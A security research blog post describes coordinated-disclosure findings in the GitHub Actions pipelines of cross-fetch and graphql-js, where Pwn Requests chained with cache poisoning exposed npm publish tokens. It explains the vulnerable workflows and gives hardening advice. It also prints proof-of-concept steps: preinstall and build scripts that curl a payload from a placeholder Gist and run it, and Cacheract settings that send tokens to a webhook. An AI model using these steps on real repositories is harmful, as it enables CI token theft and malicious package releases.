
We Hacked the npm Supply Chain of 36 Million Weekly Installs

Oct 03, 2025

RONI CARTA | LUPIN

Supply Chain Attack, Hack, Bug Bounty, Depi, Gato-X

Intro

In the past months, our team at Lupin & Holmes has been conducting extensive offensive research into Software Supply Chain vulnerabilities affecting widely used JavaScript libraries. This research was not a one-off test or an isolated bug hunt; it was part of an ongoing effort to understand how misconfigurations in GitHub Actions pipelines can cascade into systemic weaknesses across the ecosystem. We carried out this work in close collaboration with Adnan Khan, the creator of Gato-X and author of numerous deep technical dives into CI/CD exploitation on his blog. Adnan has pioneered research on concepts like Pwn Requests and Cache Poisoning in GitHub Actions, and his tooling and methodology have become the de facto standard for weaponizing these classes of bugs. Together, we decided to push this research further: not just proving single exploits, but testing how far these flaws could scale when combined with our platform Depi, which is designed to resolve entire dependency trees and map their upstream attack surfaces.

Over the course of this research, we coordinated the disclosure of multiple critical issues across high-profile projects. In this article, we are going to focus on two specific case studies:

  • cross-fetch (Reported in March 2025): a foundational fetch polyfill package with more than 20 million weekly downloads, used both directly and indirectly across nearly every JavaScript ecosystem.

  • GraphQL-JS (Reported in May 2025): the reference implementation of GraphQL in JavaScript, with over 16 million weekly downloads (note: it has since increased to 19M \o/), powering frameworks like Apollo, Relay, and a vast number of backend services.

Both vulnerabilities stemmed from the same underlying anti-pattern: unsafe GitHub Actions configurations that blurred the boundary between untrusted pull requests and privileged workflows. In both cases, attackers could exploit this misconfiguration via a combination of Pwn Requests (executing arbitrary code in CI from a pull request) and Cache Poisoning (seeding malicious entries that would later be restored in privileged jobs). The end result was the same: the theft of maintainer NPM tokens, which could be used to publish rogue versions of the packages.

What makes these cases particularly striking is not just the technical elegance of the exploits, but the scale of the potential blast radius. With tens of millions of installations per week, a single compromised release of cross-fetch or graphql-js would silently propagate malicious code into thousands of downstream applications, CI/CD pipelines, and developer environments. The vulnerabilities were not limited to hypothetical edge cases; they were concrete, reproducible, and carried a direct path from "open a pull request" to "control the published package".

In this post, we will provide a deep technical breakdown of both attack paths: how the workflows were misconfigured, how we chained Pwn Requests with Cache Poisoning, how we built working Proofs of Concept using Cacheract, and why these issues matter for the security of the wider ecosystem. We will also explain how we scaled this research with Depi + Gato-X, turning what could have been isolated bugs into a systematic mapping of CI/CD attack surfaces across the dependency graph. Finally, we will tie this research to the recent NX compromise, showing how these upstream attack patterns are no longer theoretical but actively weaponized against critical infrastructure.

What’s a Pwn Request?

A Pwn Request occurs when a privileged workflow executes untrusted pull-request code. Adnan Khan’s 2023 breakdown "One Supply Chain Attack to Rule Them All" explains that workflows triggered by pull_request_target, issue_comment, workflow_run responders, or PR-bot commands are built for convenience, and that they quietly grant repository-level power: a write-capable GITHUB_TOKEN, repository secrets, deploy keys, and environment secrets.

Attackers operating from forks can influence those code paths. The most common mistake is using pull_request_target with an explicit checkout of the PR head or merge revision. That checkout is often followed by lifecycle scripts like npm install, build steps, or test runners, and it can also run project-controlled tasks such as package.json scripts. At that moment, the attacker’s branch decides what executes.

Here’s a vulnerable pattern distilled from real incidents (simplified). It combines a repo-context trigger with a checkout of PR code and lifecycle scripts, exactly the "Pwn Request" anti-pattern:

# Antipattern: privileged trigger + executes PR code
name: Bot PR Handler
on:
  pull_request_target:
    types: [opened, synchronize, reopened]
permissions:
  contents: write   # repo-context; powerful
  pull-requests: write
jobs:
  build-and-comment:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        # This is the critical flaw: checking out attacker-controlled code
        with:
          ref: ${{ github.event.pull_request.head.sha }}
          persist-credentials: true   # leaves a write-capable token configured
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci --ignore-scripts=false   # runs attacker’s package.json scripts
      - run: npm test                        # attacker can hijack test command too

GitHub Security Lab calls out this pattern as dangerous by design: pull_request_target runs with target repo context and is meant for label/comment automation, not for building the untrusted PR; if you then check out and execute PR-controlled code, you’ve built a privileged trampoline for arbitrary code execution.

The intended model is to process the untrusted PR with the lower privilege pull_request trigger and, if needed, hand off results via artifacts to a second, privileged workflow_run job. Any other shortcut mixes trust boundaries.

Technically, the Pwn-Request kill chain is short and lethal. With a privileged runner processing PR content, the attacker’s PR can:

  1. Hijack build/test steps via preinstall/postinstall or custom scripts, for instance
  2. Read or pivot on the repo-scoped GITHUB_TOKEN (especially if actions/checkout left it on disk because persist-credentials: true was set), as shown in the sketch after this list
  3. Exfiltrate repository or environment secrets
  4. Set up persistence for later stages (e.g., priming caches or artifacts that future jobs will trust)
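
To make point 2 concrete: when actions/checkout persists credentials, it writes the token into the repository’s local git config as a basic-auth header, so any later step or lifecycle script on the same runner can simply read it back. A minimal illustrative step (a sketch, not taken from either project’s workflows):

- name: Read back the persisted credential (illustration only)
  run: |
    # actions/checkout stores the token under this config key by default
    git config --get http.https://github.com/.extraheader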

The defensive posture is easy: default GITHUB_TOKEN permissions should be least-privileged (GitHub introduced granular controls and defaults; set permissions: explicitly and prefer read-only for CI), avoid pull_request_target unless you truly need repo-context operations, gate privileged actions behind environments with required reviewers, and prefer OIDC-based short-lived cloud tokens over long-lived secrets.

GitHub’s changelogs and blog posts document the move to finer-grained token permissions and OIDC-based deployments specifically to shrink this blast radius. If you must "talk back" to a PR (labels, comments, status), run the build in pull_request, upload artifacts, then let a separate workflow_run job (with repo context) post results, never the other way around. In short: Pwn Requests are rarely "Zero Days" so much as Zero Separation between untrusted inputs and privileged workflows.
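
For reference, here is a minimal sketch of that separation, assuming a results/ directory and an artifact named pr-results (both illustrative, not taken from the projects discussed below): the untrusted build runs under pull_request with a read-only token, and a separate workflow_run responder with write permissions only consumes its artifact.

# ci.yml — untrusted: builds and tests the PR, no secrets, read-only token
name: CI
on: pull_request
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci && npm test
      - uses: actions/upload-artifact@v4
        with:
          name: pr-results
          path: results/

# pr-comment.yml — privileged responder: posts results back, never executes PR code
name: PR Comment
on:
  workflow_run:
    workflows: [CI]
    types: [completed]
permissions:
  actions: read          # needed to download the artifact from the CI run
  pull-requests: write
jobs:
  comment:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: pr-results
          run-id: ${{ github.event.workflow_run.id }}
          github-token: ${{ secrets.GITHUB_TOKEN }}
      - run: echo "post the downloaded results as a PR comment here"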

Cache Poisoning in a GitHub Action? Really?

The Cache Poisoning technique that Adnan detailed in 2024 (and later weaponized via Cacheract) exploits how the Actions cache is addressed, restored, and saved. When a workflow uses actions/cache (directly) or an action that implicitly caches (e.g., actions/setup-node with cache: npm), GitHub computes a client-controlled cache key and a version and retrieves the most recent match; on a miss, it saves a new cache with those identifiers at job end.
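
To make the "client-controlled" part concrete, both the explicit and the implicit forms derive the cache key from files the PR author can modify; a minimal sketch of the two step shapes (layout is illustrative):

# Explicit form: the workflow computes the key itself, typically a lockfile hash
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}
    restore-keys: |
      ${{ runner.os }}-node-

# Implicit form: setup-node derives an equivalent lockfile-based key internally
- uses: actions/setup-node@v4
  with:
    node-version: 20
    cache: npm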

If an attacker first gains code execution in any job that can write caches (often via a Pwn Request in the default branch), they can pre-create or overwrite entries with crafted tarballs that contain extra files beyond dependencies. Because cache restore uses tar extraction and caches can be reused across jobs and across workflows (within repo/ref scoping), the attacker’s injected files resurface later, in a more privileged job or in a release pipeline. The result is cache-native persistence: files the victim didn’t expect to be executable (like an action’s index.js or a post-step script under the _actions directory on the runner) get silently replaced, then execute when the poisoned cache is restored in a future job.

(Figure: Actions cache schema)

Adnan dubs one variant "Actions Cache Blasting": once you have the runtime cache URL/token in the job environment, you can shovel multiple entries to seed future keys and "wait" for a cache hit to detonate. The insidious part is that all of this looks like normal cache traffic, and the final privileged job never "runs the attacker’s code" directly, it restores a cache and the cache does the rest.

Cacheract operationalizes the attack: it steals the job’s runtime tokens, predicts or enumerates future cache keys (for example, by hashing package-lock.json the same way setup-node does), and writes tarballs that both place payloads and overwrite on-runner action files the pipeline will inevitably execute (e.g., actions/checkout post-steps). Even after GitHub hardened save-timing semantics (blocking writes after a job concludes), a correctly timed payload that runs during a default-branch job can still set (or "pre-poison") entries, then rely on downstream jobs, including release/publish jobs with registry tokens and provenance, to restore and execute.

Because Actions caches are intentionally immutable by key and write-once, attackers don’t "update" a cache; they race to create the right cache before the victim does, or they create keys that will later become the default-branch key once a PR merges (Dependabot PRs make this startlingly predictable). It’s all "working as intended," which is what makes it effective.

Defenders should understand the official cache semantics (keying, save/restore behavior, branch/ref scoping, restore-keys fallback), and where that intersects with privileged workflows, before deciding where cache is safe to consume. In general, do not consume caches in release/publish jobs; prefer hermetic, cache-free builds for anything that touches signing, provenance, or registry publish.
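
As a hedged sketch of what a hermetic publish job can look like: no actions/cache step, no cache: input on setup-node, and a fresh install with lifecycle scripts disabled (job, environment, and secret names here are illustrative, not a drop-in fix for the workflows discussed below):

publish:
  runs-on: ubuntu-latest
  environment: npm-publish          # gate the job behind required reviewers
  permissions:
    contents: read
    id-token: write                 # only needed for npm --provenance
  steps:
    - uses: actions/checkout@v4
      with:
        persist-credentials: false
    - uses: actions/setup-node@v4
      with:
        node-version-file: '.nvmrc'
        registry-url: 'https://registry.npmjs.org'
        # deliberately no `cache: npm` here
    - run: npm ci --ignore-scripts   # hermetic install, nothing restored from a cache
    - run: npm publish --provenance
      env:
        NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}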

Simple idea: Let’s go BRRRRRR on the Offensive Security Scanning

Depi x Gato-X

At the heart of our approach is the idea that modern Software Supply Chain security cannot be tackled one repository at a time. With millions of packages, transitive dependencies, and constantly changing CI/CD pipelines, the attack surface is simply too large to handle manually. This is why we built Depi, our SaaS platform dedicated to offensive supply-chain security. Ok I know it sounds a bit like a marketing paragraph, but I swear it’s important to understand what we did next! :D

Depi performs what we call full dependency tree resolution: starting from a target project, it recursively maps out every direct and indirect dependency, and for each one, it follows the links back to their upstream Git repositories, build systems, and CI/CD configurations. Instead of only asking "is this package malicious?" Depi asks the deeper question: "what links of trust exist between this package, its maintainers, and the workflows that build and release it?".

By doing so, Depi transforms what looks like a flat list of package versions into a graph of attack surfaces, where every edge is a potential compromise path, from developer machines to build pipelines to registry publish tokens.

But resolving the graph is only the first half of the story. Finding connections does not automatically prove exploitation. To scale this kind of research, we needed a way to stress-test thousands of GitHub Actions pipelines automatically. This is where Gato-X, created by Adnan Khan, comes into play.

Gato-X is essentially an Open Source Exploitation Framework for CI/CD: it knows how to detect Pwn Requests and how to escalate from an unprivileged pull request into the theft of sensitive credentials like NPM_TOKEN or GITHUB_TOKEN.

Adnan has been documenting these classes of attacks for years on his blog, and Gato-X encodes that knowledge into automation. On its own, Gato-X is a powerful tool to analyze a single repository’s workflows and tell you whether they are exploitable. Combined with Depi, it becomes something else entirely: a scalable exploitation pipeline. Depi enumerates the full ecosystem of dependencies, repositories, and workflows; Gato-X ingests them and runs its suite of attacks; and the results are fed back into Depi as structured findings. This integration means we don’t just know where the weak spots are, we can validate how they break, at scale.

The end result for us as researchers is simple: we feed in a large corpus of targets coming from thousands of Bug Bounty Programs, and then we just sit back and wait for the results to surface. What comes back is not noise, but a prioritized map of real compromise paths, PR workflows that leak tokens, caches that can be poisoned, release jobs that can be hijacked. This loop closes the gap between research and operations, letting us research upstream exploits at scale. It’s not just scalable scanning, it’s scalable exploitation research.

Introducing Cross-Fetch

Cross-Fetch is a lightweight fetch polyfill that works seamlessly across Node.js and browsers. It is used everywhere: frontend frameworks, server-side applications, and even tooling libraries. With over 20 million weekly downloads, its footprint is enormous, and any compromise would ripple downstream instantly into thousands of other packages and applications.


In March 2025, during the first Depi x Gato-X scan in Research Mode (not available to our customers at the time), we uncovered a GitHub Actions misconfiguration in Cross-Fetch’s CI/CD setup. The flaw allowed attackers to escalate from a simple Pwn Request into Cache Poisoning, ultimately stealing the NPM_TOKEN used in the release pipeline.

The PR Workflow (pr.yml) - The Entry Point

The vulnerable entrypoint was the PR validation workflow, designed to test contributions from forks. At the time, it looked like this:

# .github/workflows/pr.yml
name: v4.x pull requests

on:
  pull_request_target:
    types:
    - opened
    - edited
    - synchronize
    branches:
    - v4.x

jobs:
  prlint:
    name: Validate PR title
    runs-on: ubuntu-latest
    steps:
    - uses: amannn/action-semantic-pull-request@v4
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

  debug:
    name: Debug
    runs-on: ubuntu-latest
    steps:
    - uses: hmarr/debug-action@v3

  install:
    name: Install
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
      with:
        ref: ${{ github.event.pull_request.head.sha }}
    - name: Cache node_modules
      id: cacheModules
      uses: actions/cache@v4
      with:
        path: ~/.npm # this is cache where npm installs from before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - name: Install dependencies
      if: steps.cacheModules.outputs.cache-hit != 'true'
      run: npm install

  checks:
    name: Checks
    needs: [install]
    uses: ./.github/workflows/checks.yml
    with:
      ref: ${{ github.event.pull_request.head.sha }}

Why this is vulnerable:

  1. Attacker controls code → PR head commit is checked out.
  2. Dangerous execution → npm install executes lifecycle scripts (preinstall, postinstall, etc.) from attacker’s package.json.
  3. Cache write → the actions/cache step stores ~/.npm under a key derived from package.json, meaning dependencies are cached. Attacker code can poison this cache by injecting malicious files.

This gave attackers the ability to run arbitrary code in the CI runner and then prime a cache entry that would later be trusted in privileged jobs.

The Release Workflow (release.yml) - The Escalation

The escalation vector came from the release workflow. Maintainers used this workflow to publish new versions of Cross-Fetch to npm. Critically, it reused the same cache entries that the PR workflow could write into.

# .github/workflows/release.yml
name: v4.x releases

on:
  push:
    branches:
    # Pushes to the branch below will test the release workflow without
    # publishing version on npm or generating new git tags
    - v4.x-test
    tags:
    - 'v4.[0-9]+.[0-9]+'
    - 'v4.[0-9]+.[0-9]+-alpha.[0-9]+'
    - 'v4.[0-9]+.[0-9]+-beta.[0-9]+'

jobs:
  install:
    name: Install
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - name: Cache node_modules
      id: cacheModules
      uses: actions/cache@v4
      with:
        path: ~/.npm # cache where "npm install" uses before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - name: Install dependencies
      if: steps.cacheModules.outputs.cache-hit != 'true'
      run: npm install

  debug:
    name: Debug
    runs-on: ubuntu-latest
    steps:
    - uses: hmarr/debug-action@v3

  checks:
    name: Check
    needs: [install]
    uses: ./.github/workflows/checks.yml
    with:
      ref: ${{ github.sha }}

  # The security job can't run on pull requests opened from forks because
  # Github doesn't pass down the SNYK_TOKEN environment variable.
  security:
    name: Check Security
    needs: [install]
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - uses: actions/cache@v4
      with:
        path: ~/.npm # cache where "npm install" uses before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - run: npm install --prefer-offline
    - run: make secure
      env:
        SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

  publish:
    name: Publish to NPM registry
    runs-on: ubuntu-latest
    needs: [checks, security]
    steps:
    - uses: actions/checkout@v4
    - uses: actions/setup-node@v4
      with:
        node-version-file: '.nvmrc'
        # Setup .npmrc file to publish to npm
        registry-url: 'https://registry.npmjs.org'
    - uses: actions/cache@v4
      with:
        path: ~/.npm # this is cache where npm installs from before going out to the network
        key: ${{ runner.os }}-node-${{ hashFiles('**/package.json') }}
    - run: npm install --prefer-offline
    - run: make publish
      env:
        NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

Why this is catastrophic:

  1. Cache restoration: The actions/cache step restored the cache entry poisoned by attacker code during a PR run.

  2. Code execution inside privileged job: When poisoned cache contents were unpacked, attacker-controlled files could hijack execution paths (e.g., overwriting node_modules/.bin/*, post-steps, or action files).

  3. Secrets exposed: This release workflow carried the NPM_TOKEN, which is required for publishing to npm. Once poisoned cache code is executed, the token could be exfiltrated.

Building the Proof of Concept with Cacheract

To demonstrate impact, we used Cacheract, Adnan Khan’s tool for exploiting GitHub Actions Cache Poisoning. Here’s how we built the PoC:

Step 1: Mirror Setup

  • Imported cross-fetch into a private test repository (VictimRepo).

  • Added a dummy NPM_TOKEN secret to simulate the real release token.

  • Forked the repo (AttackerRepo) to simulate an attacker’s PR.

Step 2: Craft the Payload

Configured Cacheract with a webhook:

// src/config.ts in Cacheract
export const DISCORD_WEBHOOK: string = "<webhook URL>";
export const REPLACEMENTS: Replacement[] = [];
export const EXPLICIT_ENTRIES: ManualCacheEntry[] = [
  {
    key: "Linux-node-<predictable-hash>", // derived from package-lock.json
    version: "<version-hash>"
  }
];

Built the payload with:

npm run build-dev

Then hosted the generated bundle.js in a GitHub Gist.

Modified package.json in the attacker’s fork to deploy the payload:

"scripts": {
  "preinstall": "curl -sSfL <CACHERACT_GIST_URL> > /tmp/run.js && node /tmp/run.js"
}


Step 3: Trigger the Exploit

  1. Opened a PR → triggered pr.yml.

    • Our malicious preinstall executed.
    • Payload primed a cache entry with attacker code.
  2. Maintainer simulated a release (git tag v4.2.0 → push).

    • release.yml consumed the poisoned cache.
    • Payload executed inside a privileged publish job.
    • Dummy NPM_TOKEN exfiltrated to webhook.


Introducing GraphQL-JS

GraphQL-JS is the reference implementation of GraphQL in JavaScript, maintained in the graphql/graphql-js repository. It sits at the core of the ecosystem, with over 16 million weekly installations across backend frameworks, APIs, and developer tooling. Because of this central role, a compromise of GraphQL-JS would have enormous downstream impact, from developer tooling to production GraphQL servers.


In May 2025, during another run of Depi x Gato-X in Research Mode, we uncovered a GitHub Actions bot misconfiguration in the GraphQL-JS CI/CD pipeline. The issue was another Pwn Request chained with Cache Poisoning. Combined, they exposed the project’s NPM_CANARY_PR_PUBLISH_TOKEN, which has publish rights to graphql on npm. In other words, an attacker could escalate from "comment on a pull request" to "publish a rogue version of GraphQL-JS".

The Bot Workflow (github-actions-bot.yml) - The Entry Point

The vulnerability exists because of the GitHubActionsBot workflow. This workflow runs on an issue_comment trigger, which means it fires on comments posted to pull requests or issues.

name: GitHubActionsBot
on:
  issue_comment:
    types:
      - created

  # We need to be call in context of the main branch to have write permissions
  # "pull_request" target is called in context of a fork
  # "pull_request_target" is called in context of the repository but not necessary latest main
  workflow_run:
    workflows:
      - PullRequestOpened
    types:
      - completed

The workflow proceeds to parse the command structure. @github-actions publish-pr-on-npm is a command that PR creators can use to publish their PR on npm as a canary version. The workflow appears to take measures to protect against running unauthorized code or being confused into publishing an unauthorized version upgrade, but there is an alternate vector for obtaining the secret.

 cmd-publish-pr-on-npm:
    needs: [accept-cmd]
    if: needs.accept-cmd.outputs.cmd == 'publish-pr-on-npm'
    uses: ./.github/workflows/cmd-publish-pr-on-npm.yml
    with:
      pullRequestJSON: ${{ needs.accept-cmd.outputs.pullRequestJSON }}
    secrets:
      NPM_CANARY_PR_PUBLISH_TOKEN: ${{ secrets.NPM_CANARY_PR_PUBLISH_TOKEN }}

The bot workflow invokes another reusable workflow, cmd-publish-pr-on-npm.yml. Within the workflow it checks out the merge commit SHA and then calls npm run build:npm. This maps to "build:npm": "node resources/build-npm.js" within the package.json file from the PR creator.

This means that the PR creator can run arbitrary code in the context of the build-npm-dist job.

jobs:
  build-npm-dist:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v2
        with:
          persist-credentials: false
          ref: ${{ fromJSON(inputs.pullRequestJSON).merge_commit_sha }}

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          cache: npm
          node-version-file: '.node-version'

      - name: Install Dependencies
        run: npm ci --ignore-scripts

      - name: Build NPM package
        run: npm run build:npm

We determined, based on historical runs, that the job has a GITHUB_TOKEN with full write access. That alone would allow serious impact on the repository, but the primary objective is the NPM token. The job proceeds to upload the built package as an artifact.


The next job, publish-canary, downloads the artifact and publishes it as a canary. The job carefully sanitizes the package name and avoids running any code. However, there is a way to pivot into it and run arbitrary code: the workflow sets up Node.js with cache: npm, which means it consumes the GitHub Actions cache. Since the previous job runs in the context of the same main branch and has access to a GITHUB_TOKEN with write access, we can leverage GitHub Actions Cache Poisoning with Cacheract to run arbitrary code in this job and capture the NPM token.

 publish-canary:
    runs-on: ubuntu-latest
    name: Publish Canary
    environment: canary-pr-npm
    needs: [build-npm-dist]
    steps:
      - name: Checkout repo
        uses: actions/checkout@v2
        with:
          persist-credentials: false

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          cache: npm
          node-version-file: '.node-version'
          # 'registry-url' is required for 'npm publish'
          registry-url: 'https://registry.npmjs.org'

      - uses: actions/download-artifact@v4
        with:
          name: npmDist
          path: npmDist

This job has a deployment environment canary-pr-npm, but the environment has no protection rules:

{
  "total_count": 5,
  "environments": [
    {
      "id": 403896839,
      "node_id": "EN_kwDOAkiGZM4YEvoH",
      "name": "canary-pr-npm",
      "url": "https://api.github.com/repos/graphql/graphql-js/environments/canary-pr-npm",
      "html_url": "https://github.com/graphql/graphql-js/deployments/activity_log?environments_filter=canary-pr-npm",
      "created_at": "2022-02-12T12:32:33Z",
      "updated_at": "2022-02-12T12:32:33Z",
      "can_admins_bypass": true,
      "protection_rules": [],
      "deployment_branch_policy": null
    }
  ]
}

You can determine this by querying https://api.github.com/repos/graphql/graphql-js/environments.

Building the Proof of Concept with Cacheract

To validate this attack, we reproduced it using Cacheract. The steps mirrored the Cross-Fetch PoC:

Step 1: Mirror Setup

  • Imported the official graphql/graphql-js repo into a controlled VictimRepo.
  • Added a dummy NPM_CANARY_PR_PUBLISH_TOKEN secret.
  • Forked the repo (AttackerRepo) to simulate an external contributor.

Step 2: Craft Payload

Configured Cacheract with a webhook for exfiltration:

// src/config.ts
export const DISCORD_WEBHOOK: string = "<webhook URL>";
export const REPLACEMENTS: Replacement[] = [];
export const EXPLICIT_ENTRIES: ManualCacheEntry[] = [
  {
    key: "node-cache-Linux-x64-npm-<predictable-hash>",
    version: "<cache-version>"
  }
];

Built the payload with:

npm run build

Hosted the generated dist.js in a GitHub Gist. Modified package.json in the attacker’s PR branch:

"scripts": {
  "npm:build": "node resources/build-npm.js && curl -sSfL <CACHERACT_GIST_URL> > /tmp/run.js && node /tmp/run.js"
}

Step 3: Trigger Exploit

  1. Attacker opens a PR and comments @github-actions publish-pr-on-npm.

  2. Bot workflow runs → executes attacker’s build:npm script.

  3. Payload poisons npm cache.

  4. Maintainer triggers canary publish.

  5. publish-canary job restores poisoned cache → payload executes.

  6. Dummy NPM_CANARY_PR_PUBLISH_TOKEN exfiltrated to webhook.

Impact

This vulnerability chain highlights the three pillars of CI/CD exploitation:

  • Confidentiality: Theft of maintainer tokens (NPM_CANARY_PR_PUBLISH_TOKEN).
  • Integrity: Ability to publish malicious GraphQL versions directly to npm.
  • Availability: Potential to disrupt downstream frameworks and APIs relying on GraphQL.

The lesson is clear: never run untrusted PR code in workflows that carry secrets, and never restore caches across trust boundaries.

Conclusion

When we step back and look at the full story of Cross-Fetch and GraphQL-JS, a disturbing truth emerges: vulnerabilities in CI/CD aren’t isolated bugs; they are system-wide bridges that let attackers walk from innocuous pull requests all the way into trusted release pipelines. Every dependency you adopt, every workflow you automate, and every cache you restore isn’t just part of your build; it’s an integral thread in your Software Supply Chain. If any upstream link is weak, it can tear down the integrity of everything downstream.

The real danger is that upstream security is no longer "someone else’s problem." The moment you depend on shared libraries, you inherit not only their code but also their trust boundaries, their workflow configurations, and their secrets. When trust boundaries are blurred, when build jobs run untrusted code or caches are reused across privilege zones, you’ve essentially handed attackers an escalator straight into your core credentials. That’s why the supply chain must shift from being a passive concern to being a strategic security frontier.

Our work with Depi and Gato-X is an invitation: embrace active, large-scale discovery and validation of CI trust surfaces. Don’t wait for a disaster to probe your dependencies; proactively map how code, workflows, and cache boundaries connect across your ecosystem. Because until we treat upstream components as part of our threat model, attackers will continue to weaponize the very convenience we’ve built into modern automation.